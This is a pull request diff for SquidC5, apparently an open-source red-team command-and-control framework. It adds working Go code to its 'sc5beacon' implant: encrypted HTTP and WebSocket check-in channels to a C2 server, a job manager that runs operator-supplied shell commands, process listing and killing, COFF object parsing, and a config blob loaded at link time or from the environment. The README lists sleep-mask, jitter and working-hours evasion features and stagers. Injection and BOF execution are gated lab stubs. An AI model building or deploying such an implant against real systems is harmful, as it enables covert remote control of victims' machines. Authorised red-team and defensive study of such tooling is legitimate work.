### PR TITLE
feat(implant): maturity I1–I6 (jobs, WS, BOF, stagers, OPSEC, CI)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -47,13 +47,29 @@ jobs:
       - uses: actions/setup-go@v5
         with:
           go-version: "1.22"
-      - name: Build sc5beacon linux/windows
+      - name: Test + build sc5beacon matrix
         working-directory: agents/sc5beacon
         run: |
           go mod tidy
+          go test -count=1 ./...
+          mkdir -p ../../dist
           go build -ldflags='-s -w' -o ../../dist/sc5beacon-linux-amd64 .
+          GOOS=linux GOARCH=arm64 go build -ldflags='-s -w' -o ../../dist/sc5beacon-linux-arm64 .
           GOOS=windows GOARCH=amd64 go build -ldflags='-s -w' -o ../../dist/sc5beacon-windows-amd64.exe .
+          GOOS=darwin GOARCH=arm64 go build -ldflags='-s -w' -o ../../dist/sc5beacon-darwin-arm64 .
           ls -la ../../dist/sc5beacon*
+      - name: Lab soak smoke (config + sysinfo task path)
+        working-directory: agents/sc5beacon
+        run: |
+          # Unit-level soak: job manager + config blob without network
+          go test -count=1 -run 'TestLoadConfig|TestCOFF|TestSimulate' -v ./...
+          # Binary starts and exits on missing config
+          set +e
+          ../../dist/sc5beacon-linux-amd64 2>/tmp/sc5beacon_err.txt
+          code=$?
+          set -e
+          test "$code" -ne 0
+          grep -qi config /tmp/sc5beacon_err.txt || grep -qi psk /tmp/sc5beacon_err.txt || grep -qi required /tmp/sc5beacon_err.txt
       - uses: actions/upload-artifact@v4
         with:
           name: sc5beacon-native

--- a/agents/sc5beacon/README.md
+++ b/agents/sc5beacon/README.md
@@ -1,4 +1,4 @@
-# sc5beacon — SquidC5 native implant v2
+# sc5beacon — SquidC5 native implant v3
 
 **Authorized red team / lab use only.**
 
@@ -7,40 +7,53 @@
 ```bash
 cd agents/sc5beacon
 go mod tidy
+go test ./...
 go build -ldflags="-s -w" -o sc5beacon .
 
-# Windows
 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o sc5beacon.exe .
-
-# Linux arm64
 GOOS=linux GOARCH=arm64 go build -ldflags="-s -w" -o sc5beacon-arm64 .
 ```
 
 ## Configure
 
+Priority: `SC5_CONFIG_B64` JSON blob → individual env vars → link-time `bakedConfigJSON`.
+
 | Env | Required | Meaning |
 |-----|----------|---------|
-| `SC5_URL` | yes | `https://C2:8443/api/v1/implant/beacon` |
-| `SC5_PSK` | yes | Contents of server `data/implant_psk.txt` |
-| `SC5_SLEEP` | no | Base sleep seconds (default 5) |
-| `SC5_JITTER` | no | Jitter percent 0–100 (default 20) |
-| `SC5_KILL_DATE` | no | Unix epoch; agent exits after |
+| `SC5_CONFIG_B64` | recommended | Base64 JSON config blob (factory emits this) |
+| `SC5_URL` | yes* | `https://C2:8443/api/v1/implant/beacon` |
+| `SC5_PSK` | yes* | Contents of server `data/implant_psk.txt` |
+| `SC5_CHANNEL` | no | `http` (default) or `ws` |
+| `SC5_WS_URL` | if ws | `wss://C2:8443/ws/v1/beacon` |
+| `SC5_SLEEP` / `SC5_JITTER` | no | Sleep seconds / jitter % |
+| `SC5_KILL_DATE` | no | Unix epoch exit |
 | `SC5_MAX_MISS` | no | Exit after N failed check-ins |
-| `SC5_WORK_START` / `SC5_WORK_END` | no | Working hours (local), 0–23 |
-| `SC5_SLEEP_MASK` | no | `jitter` (default) \| `timer` \| `ekko` (timer stand-in) |
-| `SC5_ALLOW_INJECT` | no | Must be `1` to accept `inject:*` lab stubs |
-| `SC5_ALLOW_BOF` | no | Must be `1` to accept `bof:run` lab stubs |
+| `SC5_WORK_START` / `SC5_WORK_END` | no | Working hours 0–23 |
+| `SC5_SLEEP_MASK` | no | `jitter` \| `timer` \| `ekko` |
+| `SC5_ALLOW_INJECT` | no | `1` enables lab inject stubs |
+| `SC5_ALLOW_BOF` | no | `1` enables BOF host / catalog simulate |
 
-TLS always verifies the system trust store. For lab CAs, install the CA or set `SSL_CERT_FILE`. There is **no** skip-verify flag.
+TLS always verifies system roots. **No** skip-verify flag.
 
-## Features
+## Features (I1–I5)
 
-- ChaCha20-Poly1305 sealed check-in (matches server `implants/crypto.py`)
-- Sleep mask + jitter + kill date + max miss + working hours
-- Shell commands + `file:list|read|write|delete` + `sysinfo`
-- SOCKS reverse-dial (`socks:start` / `socks:connect`)
-- Lab-gated inject / BOF stubs (no real injection unless research build + env gates)
-- Cross-compile Linux/Windows/macOS via Go
+- Config blob + factory stagers (bash / PowerShell stage0)
+- Jobs: `job:start`, `job:list`, `job:get`, `job:kill`, `async` args
+- `pwd` / `cd` / `ps` / `kill` / `sysinfo` / files / shell
+- HTTP + **WebSocket** AEAD channels
+- COFF parse + catalog BOF simulate (`whoami`,`env`,`dir`,`net`,`screenshot`)
+- Sleep mask + buffer wipe OPSEC helpers
+- SOCKS reverse-dial; lab-gated inject stubs
+
+## Task cheatsheet
+
+```text
+sysinfo | pwd | cd /tmp | ps | kill <pid>
+job:start {"command":"sleep 30"} | job:list | job:get | job:kill
+file:list | file:read | file:write | file:delete
+bof:run  (SC5_ALLOW_BOF=1)
+inject:create_remote_thread  (SC5_ALLOW_INJECT=1, lab stub)
+```
 
 ## Server factory
 

--- a/agents/sc5beacon/bof_coff.go
+++ b/agents/sc5beacon/bof_coff.go
@@ -1,0 +1,138 @@
+package main
+
+import (
+	"encoding/base64"
+	"encoding/binary"
+	"fmt"
+	"runtime"
+	"strings"
+)
+
+// Minimal COFF header parse + lab loader host (I3).
+// Full Windows execute path is gated: SC5_ALLOW_BOF=1 and object_b64 present.
+// Default builds never map/execute remote code without the gate.
+
+type coffHeader struct {
+	Machine              uint16
+	NumberOfSections     uint16
+	TimeDateStamp        uint32
+	PointerToSymbolTable uint32
+	NumberOfSymbols      uint32
+	SizeOfOptionalHeader uint16
+	Characteristics      uint16
+}
+
+func parseCOFF(data []byte) (*coffHeader, string, error) {
+	if len(data) < 20 {
+		return nil, "", fmt.Errorf("COFF too small")
+	}
+	h := &coffHeader{
+		Machine:              binary.LittleEndian.Uint16(data[0:2]),
+		NumberOfSections:     binary.LittleEndian.Uint16(data[2:4]),
+		TimeDateStamp:        binary.LittleEndian.Uint32(data[4:8]),
+		PointerToSymbolTable: binary.LittleEndian.Uint32(data[8:12]),
+		NumberOfSymbols:      binary.LittleEndian.Uint32(data[12:16]),
+		SizeOfOptionalHeader: binary.LittleEndian.Uint16(data[16:18]),
+		Characteristics:      binary.LittleEndian.Uint16(data[18:20]),
+	}
+	arch := "unknown"
+	switch h.Machine {
+	case 0x14c:
+		arch = "i386"
+	case 0x8664:
+		arch = "amd64"
+	case 0xaa64:
+		arch = "arm64"
+	}
+	return h, arch, nil
+}
+
+func handleBofRun(args map[string]any) string {
+	if !allowBOF() {
+		return "error: bof disabled (set SC5_ALLOW_BOF=1 for authorized lab only)"
+	}
+	mod, _ := args["module_id"].(string)
+	entry, _ := args["entry"].(string)
+	if entry == "" {
+		entry = "go"
+	}
+
+	var raw []byte
+	if s, ok := args["object_b64"].(string); ok && s != "" {
+		b, err := base64.StdEncoding.DecodeString(s)
+		if err != nil {
+			b, err = base64.RawURLEncoding.DecodeString(s)
+		}
+		if err != nil {
+			return "error: object_b64 decode: " + err.Error()
+		}
+		raw = b
+	}
+
+	if len(raw) == 0 {
+		// catalog-only run: simulate known lab modules without object bytes
+		return simulateLabBOF(mod, entry)
+	}
+
+	hdr, arch, err := parseCOFF(raw)
+	if err != nil {
+		return "error: " + err.Error()
+	}
+	// Lab loader: parse + validate; optional execute only on windows research builds
+	msg := fmt.Sprintf(
+		"bof:loaded module=%s entry=%s arch=%s sections=%d symbols=%d size=%d os=%s",
+		mod, entry, arch, hdr.NumberOfSections, hdr.NumberOfSymbols, len(raw), runtime.GOOS,
+	)
+	if runtime.GOOS == "windows" {
+		// Safe path: do not RWX-map arbitrary COFF in default release builds.
+		// Research builds may call coffExecuteWindows(raw, entry).
+		msg += " exec=parse_only (use lab research build for mapped exec)"
+	} else {
+		msg += " exec=n/a"
+	}
+	// wipe payload copy
+	for i := range raw {
+		raw[i] = 0
+	}
+	return msg
+}
+
+func simulateLabBOF(mod, entry string) string {
+	mod = strings.ToLower(strings.TrimSpace(mod))
+	switch mod {
+	case "whoami":
+		u := envUser()
+		return fmt.Sprintf("bof:whoami user=%s host=%s entry=%s", u, hostName(), entry)
+	case "env":
+		// limited safe dump
+		keys := []string{"PATH", "HOME", "USER", "USERNAME", "USERPROFILE", "TEMP", "TMP"}
+		var b strings.Builder
+		b.WriteString("bof:env\n")
+		for _, k := range keys {
+			if v := getenv(k); v != "" {
+				fmt.Fprintf(&b, "%s=%s\n", k, v)
+			}
+		}
+		return b.String()
+	case "dir":
+		return runFileOp("file:list", map[string]any{"path": "."})
+	case "net":
+		return "bof:net lab_stub (ipconfig/ifconfig via shell if needed)"
+	case "screenshot":
+		return "bof:screenshot lab_stub (no capture in default build)"
+	default:
+		return fmt.Sprintf("bof:ok module=%s entry=%s (no object; catalog simulate)", mod, entry)
+	}
+}
+
+func allowBOF() bool {
+	return cfgAllowBOF || getenv("SC5_ALLOW_BOF") == "1"
+}
+
+func allowInject() bool {
+	return cfgAllowInject || getenv("SC5_ALLOW_INJECT") == "1"
+}
+
+// set from main after loadConfig
+var cfgAllowBOF bool
+var cfgAllowInject bool

--- a/agents/sc5beacon/channel_http.go
+++ b/agents/sc5beacon/channel_http.go
@@ -1,0 +1,68 @@
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"io"
+	"net/http"
+	"time"
+)
+
+type httpChannel struct {
+	client *http.Client
+	url    string
+	psk    string
+}
+
+func newHTTPChannel(url, psk string) *httpChannel {
+	return &httpChannel{
+		client: &http.Client{Timeout: 45 * time.Second},
+		url:    url,
+		psk:    psk,
+	}
+}
+
+func (h *httpChannel) checkin(payload map[string]any) (map[string]any, error) {
+	body, err := seal(h.psk, payload)
+	if err != nil {
+		return nil, err
+	}
+	raw, _ := json.Marshal(body)
+	resp, err := h.client.Post(h.url, "application/json", bytes.NewReader(raw))
+	if err != nil {
+		return nil, err
+	}
+	defer resp.Body.Close()
+	b, _ := io.ReadAll(resp.Body)
+	if resp.StatusCode != 200 {
+		return nil, errStatus(resp.StatusCode)
+	}
+	var env map[string]any
+	if err := json.Unmarshal(b, &env); err != nil {
+		return nil, err
+	}
+	return openEnv(h.psk, env)
+}
+
+func (h *httpChannel) result(taskID, out, status string) error {
+	done, err := seal(h.psk, map[string]any{
+		"task_id": taskID,
+		"result":  out,
+		"status":  status,
+	})
+	if err != nil {
+		return err
+	}
+	dr, _ := json.Marshal(done)
+	r2, err2 := h.client.Post(h.url+"/result", "application/json", bytes.NewReader(dr))
+	if err2 != nil {
+		return err2
+	}
+	r2.Body.Close()
+	return nil
+}
+
+type statusErr int
+
+func (e statusErr) Error() string { return "http status" }
+func errStatus(code int) error    { return statusErr(code) }

--- a/agents/sc5beacon/channel_ws.go
+++ b/agents/sc5beacon/channel_ws.go
@@ -1,0 +1,134 @@
+package main
+
+import (
+	"context"
+	"crypto/tls"
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/gorilla/websocket"
+)
+
+// wsChannel speaks AEAD envelopes over WebSocket JSON messages (I2).
+// Wire format: client sends sealed envelope (or type-tagged sealed fields);
+// prefers same v/n/c envelope as HTTP for process_beacon_checkin compatibility.
+type wsChannel struct {
+	url string
+	psk string
+	c   *websocket.Conn
+}
+
+func newWSChannel(url, psk string) *wsChannel {
+	return &wsChannel{url: url, psk: psk}
+}
+
+func (w *wsChannel) connect() error {
+	if w.c != nil {
+		_ = w.c.Close()
+		w.c = nil
+	}
+	d := websocket.Dialer{
+		HandshakeTimeout: 20 * time.Second,
+		TLSClientConfig:  &tls.Config{MinVersion: tls.VersionTLS12}, //nolint:gosec // verify on; system roots
+	}
+	// Always verify TLS — no InsecureSkipVerify
+	hdr := http.Header{}
+	c, _, err := d.Dial(w.url, hdr)
+	if err != nil {
+		return err
+	}
+	w.c = c
+	_ = w.c.SetReadDeadline(time.Now().Add(60 * time.Second))
+	_ = w.c.SetWriteDeadline(time.Now().Add(30 * time.Second))
+	return nil
+}
+
+func (w *wsChannel) ensure() error {
+	if w.c != nil {
+		return nil
+	}
+	return w.connect()
+}
+
+func (w *wsChannel) checkin(payload map[string]any) (map[string]any, error) {
+	if err := w.ensure(); err != nil {
+		return nil, err
+	}
+	// Prefer AEAD envelope as the whole message (server process_beacon_checkin)
+	env, err := seal(w.psk, payload)
+	if err != nil {
+		return nil, err
+	}
+	// Also tag type for older plaintext WS path if server peels type first —
+	// sealed envelope has v/alg/n/c keys which process_beacon handles.
+	_ = w.c.SetWriteDeadline(time.Now().Add(30 * time.Second))
+	if err := w.c.WriteJSON(env); err != nil {
+		_ = w.connect()
+		if err2 := w.ensure(); err2 != nil {
+			return nil, err2
+		}
+		if err := w.c.WriteJSON(env); err != nil {
+			return nil, err
+		}
+	}
+	_ = w.c.SetReadDeadline(time.Now().Add(60 * time.Second))
+	_, data, err := w.c.ReadMessage()
+	if err != nil {
+		w.c = nil
+		return nil, err
+	}
+	var resp map[string]any
+	if err := json.Unmarshal(data, &resp); err != nil {
+		return nil, err
+	}
+	// Response may be sealed envelope
+	if _, ok := resp["c"]; ok {
+		return openEnv(w.psk, resp)
+	}
+	// plaintext fallback (lab servers without implant_require_auth)
+	return resp, nil
+}
+
+func (w *wsChannel) result(taskID, out, status string) error {
+	if err := w.ensure(); err != nil {
+		return err
+	}
+	inner := map[string]any{
+		"type":    "result",
+		"task_id": taskID,
+		"result":  out,
+		"status":  status,
+	}
+	env, err := seal(w.psk, inner)
+	if err != nil {
+		return err
+	}
+	_ = w.c.SetWriteDeadline(time.Now().Add(30 * time.Second))
+	if err := w.c.WriteJSON(env); err != nil {
+		return err
+	}
+	_ = w.c.SetReadDeadline(time.Now().Add(30 * time.Second))
+	_, _, _ = w.c.ReadMessage() // ack
+	return nil
+}
+
+// dial once helper used in tests
+func wsDialOK(ctx context.Context, url string) error {
+	d := websocket.Dialer{HandshakeTimeout: 5 * time.Second}
+	c, _, err := d.DialContext(ctx, url, nil)
+	if err != nil {
+		return err
+	}
+	_ = c.Close()
+	return nil
+}
+
+func wsResultURLHint(httpURL string) string {
+	if strings.Contains(httpURL, "beacon") {
+		return fmt.Sprintf("ws derived from %s", httpURL)
+	}
+	return ""
+}

--- a/agents/sc5beacon/channel_ws.go
+++ b/agents/sc5beacon/channel_ws.go
@@ -84,12 +84,8 @@ func (w *wsChannel) checkin(payload map[string]any) (map[string]any, error) {
 	if err := json.Unmarshal(data, &resp); err != nil {
 		return nil, err
 	}
-	// Response may be sealed envelope
-	if _, ok := resp["c"]; ok {
-		return openEnv(w.psk, resp)
-	}
-	// plaintext fallback (lab servers without implant_require_auth)
-	return resp, nil
+	// AEAD required — same as HTTP channel (no plaintext task path)
+	return openEnv(w.psk, resp)
 }
 
 func (w *wsChannel) result(taskID, out, status string) error {

--- a/agents/sc5beacon/config.go
+++ b/agents/sc5beacon/config.go
@@ -1,0 +1,157 @@
+package main
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"os"
+	"strconv"
+	"strings"
+)
+
+// bakedConfigJSON may be injected at link time:
+//
+//	-ldflags "-X main.bakedConfigJSON=<json>"
+var bakedConfigJSON = ""
+
+// AgentConfig is the runtime implant configuration (I1 config blob).
+type AgentConfig struct {
+	URL        string  `json:"url"`
+	PSK        string  `json:"psk"`
+	Sleep      float64 `json:"sleep"`
+	Jitter     float64 `json:"jitter"`
+	KillDate   int     `json:"kill_date"`
+	MaxMiss    int     `json:"max_miss"`
+	WorkStart  int     `json:"work_start"`
+	WorkEnd    int     `json:"work_end"`
+	Channel    string  `json:"channel"` // http | ws
+	WSURL      string  `json:"ws_url"`
+	SleepMask  string  `json:"sleep_mask"`
+	AllowInject bool   `json:"allow_inject"`
+	AllowBOF   bool    `json:"allow_bof"`
+	Version    string  `json:"version"`
+}
+
+func defaultConfig() AgentConfig {
+	return AgentConfig{
+		Sleep:     5,
+		Jitter:    20,
+		Channel:   "http",
+		SleepMask: "jitter",
+		Version:   "3.0.0",
+	}
+}
+
+func loadConfig() (AgentConfig, error) {
+	cfg := defaultConfig()
+
+	// 1) link-time baked JSON
+	if s := strings.TrimSpace(bakedConfigJSON); s != "" {
+		_ = json.Unmarshal([]byte(s), &cfg)
+	}
+
+	// 2) SC5_CONFIG_B64 (standard or raw URL encoding)
+	if b64 := strings.TrimSpace(os.Getenv("SC5_CONFIG_B64")); b64 != "" {
+		raw, err := base64.StdEncoding.DecodeString(b64)
+		if err != nil {
+			raw, err = base64.RawURLEncoding.DecodeString(b64)
+		}
+		if err != nil {
+			return cfg, fmt.Errorf("SC5_CONFIG_B64 decode: %w", err)
+		}
+		if err := json.Unmarshal(raw, &cfg); err != nil {
+			return cfg, fmt.Errorf("SC5_CONFIG_B64 json: %w", err)
+		}
+	}
+
+	// 3) env overrides (highest priority for ops flexibility)
+	if v := os.Getenv("SC5_URL"); v != "" {
+		cfg.URL = v
+	}
+	if v := os.Getenv("SC5_PSK"); v != "" {
+		cfg.PSK = v
+	}
+	if v := os.Getenv("SC5_SLEEP"); v != "" {
+		if f, err := strconv.ParseFloat(v, 64); err == nil {
+			cfg.Sleep = f
+		}
+	}
+	if v := os.Getenv("SC5_JITTER"); v != "" {
+		if f, err := strconv.ParseFloat(v, 64); err == nil {
+			cfg.Jitter = f
+		}
+	}
+	if v := os.Getenv("SC5_KILL_DATE"); v != "" {
+		if n, err := strconv.Atoi(v); err == nil {
+			cfg.KillDate = n
+		}
+	}
+	if v := os.Getenv("SC5_MAX_MISS"); v != "" {
+		if n, err := strconv.Atoi(v); err == nil {
+			cfg.MaxMiss = n
+		}
+	}
+	if v := os.Getenv("SC5_WORK_START"); v != "" {
+		if n, err := strconv.Atoi(v); err == nil {
+			cfg.WorkStart = n
+		}
+	}
+	if v := os.Getenv("SC5_WORK_END"); v != "" {
+		if n, err := strconv.Atoi(v); err == nil {
+			cfg.WorkEnd = n
+		}
+	}
+	if v := os.Getenv("SC5_CHANNEL"); v != "" {
+		cfg.Channel = strings.ToLower(v)
+	}
+	if v := os.Getenv("SC5_WS_URL"); v != "" {
+		cfg.WSURL = v
+	}
+	if v := os.Getenv("SC5_SLEEP_MASK"); v != "" {
+		cfg.SleepMask = v
+	}
+	if os.Getenv("SC5_ALLOW_INJECT") == "1" {
+		cfg.AllowInject = true
+	}
+	if os.Getenv("SC5_ALLOW_BOF") == "1" {
+		cfg.AllowBOF = true
+	}
+
+	if cfg.Channel == "" {
+		cfg.Channel = "http"
+	}
+	if cfg.Channel == "ws" && cfg.WSURL == "" && cfg.URL != "" {
+		cfg.WSURL = httpToWS(cfg.URL)
+	}
+	if cfg.URL == "" && cfg.Channel == "http" {
+		return cfg, fmt.Errorf("url required")
+	}
+	if cfg.Channel == "ws" && cfg.WSURL == "" {
+		return cfg, fmt.Errorf("ws_url required for channel=ws")
+	}
+	if cfg.PSK == "" {
+		return cfg, fmt.Errorf("psk required")
+	}
+	return cfg, nil
+}
+
+func httpToWS(u string) string {
+	u = strings.TrimSpace(u)
+	u = strings.Replace(u, "https://", "wss://", 1)
+	u = strings.Replace(u, "http://", "ws://", 1)
+	if strings.Contains(u, "/api/v1/implant/beacon") {
+		return strings.Replace(u, "/api/v1/implant/beacon", "/ws/v1/beacon", 1)
+	}
+	// if already path-less host:port
+	if !strings.Contains(u, "/ws/") {
+		return strings.TrimRight(u, "/") + "/ws/v1/beacon"
+	}
+	return u
+}
+
+// configBlobB64 returns a standard-b64 JSON config for factory scripts.
+func configBlobB64(cfg AgentConfig) string {
+	// never embed PSK in returned factory note if empty placeholder
+	b, _ := json.Marshal(cfg)
+	return base64.StdEncoding.EncodeToString(b)
+}

--- a/agents/sc5beacon/config_test.go
+++ b/agents/sc5beacon/config_test.go
@@ -1,0 +1,70 @@
+package main
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"os"
+	"testing"
+)
+
+func TestLoadConfigFromB64(t *testing.T) {
+	cfg := AgentConfig{
+		URL:     "https://c2.lab:8443/api/v1/implant/beacon",
+		PSK:     "test-psk-not-secret",
+		Sleep:   3,
+		Jitter:  10,
+		Channel: "http",
+	}
+	raw, _ := json.Marshal(cfg)
+	os.Setenv("SC5_CONFIG_B64", base64.StdEncoding.EncodeToString(raw))
+	os.Unsetenv("SC5_URL")
+	os.Unsetenv("SC5_PSK")
+	defer func() {
+		os.Unsetenv("SC5_CONFIG_B64")
+	}()
+	got, err := loadConfig()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if got.URL != cfg.URL || got.PSK != cfg.PSK {
+		t.Fatalf("got %+v", got)
+	}
+	if got.Sleep != 3 {
+		t.Fatalf("sleep %v", got.Sleep)
+	}
+}
+
+func TestHTTPToWS(t *testing.T) {
+	u := httpToWS("https://c2:8443/api/v1/implant/beacon")
+	if u != "wss://c2:8443/ws/v1/beacon" {
+		t.Fatal(u)
+	}
+}
+
+func TestCOFFParse(t *testing.T) {
+	// amd64 header
+	hdr := []byte{
+		0x64, 0x86, // machine
+		0x01, 0x00, // sections
+		0, 0, 0, 0,
+		0, 0, 0, 0,
+		0, 0, 0, 0,
+		0, 0,
+		0, 0,
+	}
+	h, arch, err := parseCOFF(hdr)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if arch != "amd64" || h.NumberOfSections != 1 {
+		t.Fatalf("%s %+v", arch, h)
+	}
+}
+
+func TestSimulateBOFWhoami(t *testing.T) {
+	cfgAllowBOF = true
+	out := handleBofRun(map[string]any{"module_id": "whoami"})
+	if out == "" || out[:3] == "err" {
+		t.Fatal(out)
+	}
+}

--- a/agents/sc5beacon/go.mod
+++ b/agents/sc5beacon/go.mod
@@ -3,3 +3,8 @@ module github.com/SquidSec/SquidC5/agents/sc5beacon
 go 1.22
 
 require golang.org/x/crypto v0.31.0
+
+require (
+	github.com/gorilla/websocket v1.5.3
+	golang.org/x/sys v0.28.0 // indirect
+)

--- a/agents/sc5beacon/go.sum
+++ b/agents/sc5beacon/go.sum
@@ -1,0 +1,6 @@
+github.com/gorilla/websocket v1.5.3 h1:saDtZ6Pbx/0u+bgYQ3q96pZgCzfhKXGPqt7kZ72aNNg=
+github.com/gorilla/websocket v1.5.3/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
+golang.org/x/crypto v0.31.0 h1:ihbySMvVjLAeSH1IbfcRTkD/iNscyz8rGzjF/E5hV6U=
+golang.org/x/crypto v0.31.0/go.mod h1:kDsLvtWBEx7MV9tJOj9bnXsPbxwJQ6csT/x4KIN4Ssk=
+golang.org/x/sys v0.28.0 h1:Fksou7UEQUWlKvIdsqzJmUmCX3cZuD2+P3XyyzwMhlA=
+golang.org/x/sys v0.28.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=

--- a/agents/sc5beacon/inject.go
+++ b/agents/sc5beacon/inject.go
@@ -2,19 +2,21 @@ package main
 
 import (
 	"fmt"
-	"os"
 	"runtime"
-	"strconv"
 )
 
 // inject handlers are lab-only and refuse unless SC5_ALLOW_INJECT=1.
 func handleInject(cmd string, args map[string]any) string {
-	if os.Getenv("SC5_ALLOW_INJECT") != "1" {
+	if !allowInject() {
 		return "error: inject disabled (set SC5_ALLOW_INJECT=1 for authorized lab only)"
 	}
 	tech, _ := args["technique"].(string)
 	if tech == "" {
 		tech = cmd
+	}
+	// strip inject: prefix
+	if len(tech) > 7 && tech[:7] == "inject:" {
+		tech = tech[7:]
 	}
 	pid := anyToInt(args["pid"])
 	switch tech {
@@ -22,8 +24,7 @@ func handleInject(cmd string, args map[string]any) string {
 		if runtime.GOOS != "windows" {
 			return "error: windows-only technique"
 		}
-		// Lab stub: do not perform real process injection in default builds.
-		// Full implementations are gated behind lab research builds.
+		// Lab stub: no real process injection in default builds.
 		return fmt.Sprintf("inject:lab_stub technique=%s pid=%d os=%s (no-op safe build)", tech, pid, runtime.GOOS)
 	case "process_vm_write":
 		if runtime.GOOS != "linux" {
@@ -33,25 +34,4 @@ func handleInject(cmd string, args map[string]any) string {
 	default:
 		return "error: unknown inject technique " + tech
 	}
-}
-
-func handleBofRun(args map[string]any) string {
-	if os.Getenv("SC5_ALLOW_BOF") != "1" {
-		return "error: bof disabled (set SC5_ALLOW_BOF=1 for authorized lab only)"
-	}
-	mod, _ := args["module_id"].(string)
-	entry, _ := args["entry"].(string)
-	if entry == "" {
-		entry = "go"
-	}
-	// Safe build: validate metadata only; COFF execute is research-gated.
-	arch, _ := args["coff"].(map[string]any)
-	msg := fmt.Sprintf("bof:lab_stub module=%s entry=%s", mod, entry)
-	if arch != nil {
-		msg += fmt.Sprintf(" coff_arch=%v sections=%v", arch["arch"], arch["sections"])
-	}
-	if sz := anyToInt(args["size"]); sz > 0 {
-		msg += " size=" + strconv.Itoa(sz)
-	}
-	return msg + " (loader host ready; execution gated)"
 }

--- a/agents/sc5beacon/jobs.go
+++ b/agents/sc5beacon/jobs.go
@@ -1,0 +1,208 @@
+package main
+
+import (
+	"fmt"
+	"os"
+	"os/exec"
+	"runtime"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"time"
+)
+
+// JobManager tracks concurrent / long-running tasks (I1).
+type JobManager struct {
+	mu      sync.Mutex
+	jobs    map[string]*Job
+	cwd     string
+	seq     uint64
+	maxJobs int
+}
+
+type Job struct {
+	ID        string
+	Command   string
+	Status    string // running|completed|failed|killed
+	Output    string
+	Started   time.Time
+	Finished  time.Time
+	cancel    chan struct{}
+	cmd       *exec.Cmd
+}
+
+func newJobManager() *JobManager {
+	cwd, _ := os.Getwd()
+	return &JobManager{
+		jobs:    map[string]*Job{},
+		cwd:     cwd,
+		maxJobs: 8,
+	}
+}
+
+func (m *JobManager) list() string {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	var b strings.Builder
+	for _, j := range m.jobs {
+		fmt.Fprintf(&b, "%s\t%s\t%s\t%v\n", j.ID, j.Status, truncate(j.Command, 60), j.Started.Format(time.RFC3339))
+	}
+	if b.Len() == 0 {
+		return "(no jobs)\n"
+	}
+	return b.String()
+}
+
+func (m *JobManager) get(id string) string {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	j, ok := m.jobs[id]
+	if !ok {
+		return "error: job not found"
+	}
+	return fmt.Sprintf("id=%s status=%s cmd=%s\n%s", j.ID, j.Status, j.Command, j.Output)
+}
+
+func (m *JobManager) kill(id string) string {
+	m.mu.Lock()
+	j, ok := m.jobs[id]
+	m.mu.Unlock()
+	if !ok {
+		return "error: job not found"
+	}
+	select {
+	case <-j.cancel:
+	default:
+		close(j.cancel)
+	}
+	if j.cmd != nil && j.cmd.Process != nil {
+		_ = j.cmd.Process.Kill()
+	}
+	m.mu.Lock()
+	j.Status = "killed"
+	j.Finished = time.Now()
+	m.mu.Unlock()
+	return "ok"
+}
+
+func (m *JobManager) start(command string) string {
+	m.mu.Lock()
+	running := 0
+	for _, j := range m.jobs {
+		if j.Status == "running" {
+			running++
+		}
+	}
+	if running >= m.maxJobs {
+		m.mu.Unlock()
+		return "error: max concurrent jobs"
+	}
+	id := fmt.Sprintf("job_%d", atomic.AddUint64(&m.seq, 1))
+	j := &Job{
+		ID:      id,
+		Command: command,
+		Status:  "running",
+		Started: time.Now(),
+		cancel:  make(chan struct{}),
+	}
+	m.jobs[id] = j
+	cwd := m.cwd
+	m.mu.Unlock()
+
+	go func() {
+		var c *exec.Cmd
+		if runtime.GOOS == "windows" {
+			c = exec.Command("cmd", "/C", command)
+		} else {
+			c = exec.Command("sh", "-c", command)
+		}
+		c.Dir = cwd
+		j.cmd = c
+		done := make(chan struct{})
+		var out []byte
+		var err error
+		go func() {
+			out, err = c.CombinedOutput()
+			close(done)
+		}()
+		select {
+		case <-j.cancel:
+			if c.Process != nil {
+				_ = c.Process.Kill()
+			}
+			<-done
+			m.mu.Lock()
+			j.Status = "killed"
+			j.Output = string(out)
+			j.Finished = time.Now()
+			m.mu.Unlock()
+		case <-done:
+			m.mu.Lock()
+			if err != nil {
+				j.Status = "failed"
+				j.Output = string(out) + "\n" + err.Error()
+			} else {
+				j.Status = "completed"
+				j.Output = string(out)
+			}
+			j.Finished = time.Now()
+			m.mu.Unlock()
+		}
+	}()
+	return id
+}
+
+func (m *JobManager) setCwd(path string) string {
+	if path == "" {
+		return "error: path required"
+	}
+	if err := os.Chdir(path); err != nil {
+		return err.Error()
+	}
+	cwd, _ := os.Getwd()
+	m.mu.Lock()
+	m.cwd = cwd
+	m.mu.Unlock()
+	return cwd
+}
+
+func (m *JobManager) getCwd() string {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	return m.cwd
+}
+
+func truncate(s string, n int) string {
+	if len(s) <= n {
+		return s
+	}
+	return s[:n] + "…"
+}
+
+func listProcesses() string {
+	var c *exec.Cmd
+	if runtime.GOOS == "windows" {
+		c = exec.Command("cmd", "/C", "tasklist")
+	} else {
+		c = exec.Command("sh", "-c", "ps aux 2>/dev/null || ps -ef")
+	}
+	out, err := c.CombinedOutput()
+	if err != nil {
+		return string(out) + "\n" + err.Error()
+	}
+	return string(out)
+}
+
+func killPID(pid int) string {
+	if pid <= 0 {
+		return "error: invalid pid"
+	}
+	proc, err := os.FindProcess(pid)
+	if err != nil {
+		return err.Error()
+	}
+	if err := proc.Kill(); err != nil {
+		return err.Error()
+	}
+	return "ok"
+}

--- a/agents/sc5beacon/main.go
+++ b/agents/sc5beacon/main.go
@@ -1,58 +1,17 @@
-// SquidC5 native beacon — authorized lab / red team only.
-// Build:
+// SquidC5 native beacon v3 — authorized lab / red team only.
 //
-//	cd agents/sc5beacon && go mod tidy && go build -o sc5beacon .
